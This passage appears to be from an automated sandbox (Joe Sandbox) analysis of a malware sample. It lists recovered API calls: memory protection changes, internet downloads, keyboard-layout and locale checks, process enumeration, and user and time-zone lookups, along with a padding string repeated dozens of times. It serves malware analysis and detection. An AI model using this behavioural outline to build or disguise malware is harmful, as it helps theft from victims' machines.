                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                      • Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
                                      • Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                      • Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62

                                      Control-flow Graph

                                      APIs
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
                                      • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
                                      • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                      • strlen.MSVCRT ref: 00404740
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 2127927946-2218711628
                                      • Opcode ID: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
                                      • Instruction ID: ab2078f5f47aa6eaeaf83cafc0758b5ab509dada1718e255d3e4d65f54e1cbb6
                                      • Opcode Fuzzy Hash: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
                                      • Instruction Fuzzy Hash: BA413F79740624ABD7109FE5FC4DADCBF70AB4C701BA08062F90A99190C7F993859B7D

                                      Control-flow Graph

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00405021
                                      • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                      • InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
                                      • KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 004050DA
                                      • InternetCloseHandle.WININET(+aA), ref: 00405109
                                      • InternetCloseHandle.WININET(?), ref: 00405116
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
                                      • String ID: +aA$+aA
                                      • API String ID: 1337183907-2425922966
                                      • Opcode ID: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                      • Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
                                      • Opcode Fuzzy Hash: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                      • Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00417EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                      • Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
                                      • Opcode Fuzzy Hash: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                      • Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                      • Process32First.KERNEL32(?,00000128), ref: 0041886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00418883
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • CloseHandle.KERNEL32(?), ref: 004188F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                      • Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
                                      • Opcode Fuzzy Hash: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                      • Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02EB5750,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                      • wsprintfA.USER32 ref: 00417C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 362916592-0
                                      • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                      • Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
                                      • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                      • Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocNameProcessUser
                                      • String ID:
                                      • API String ID: 1206570057-0
                                      • Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                      • Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
                                      • Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                      • Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
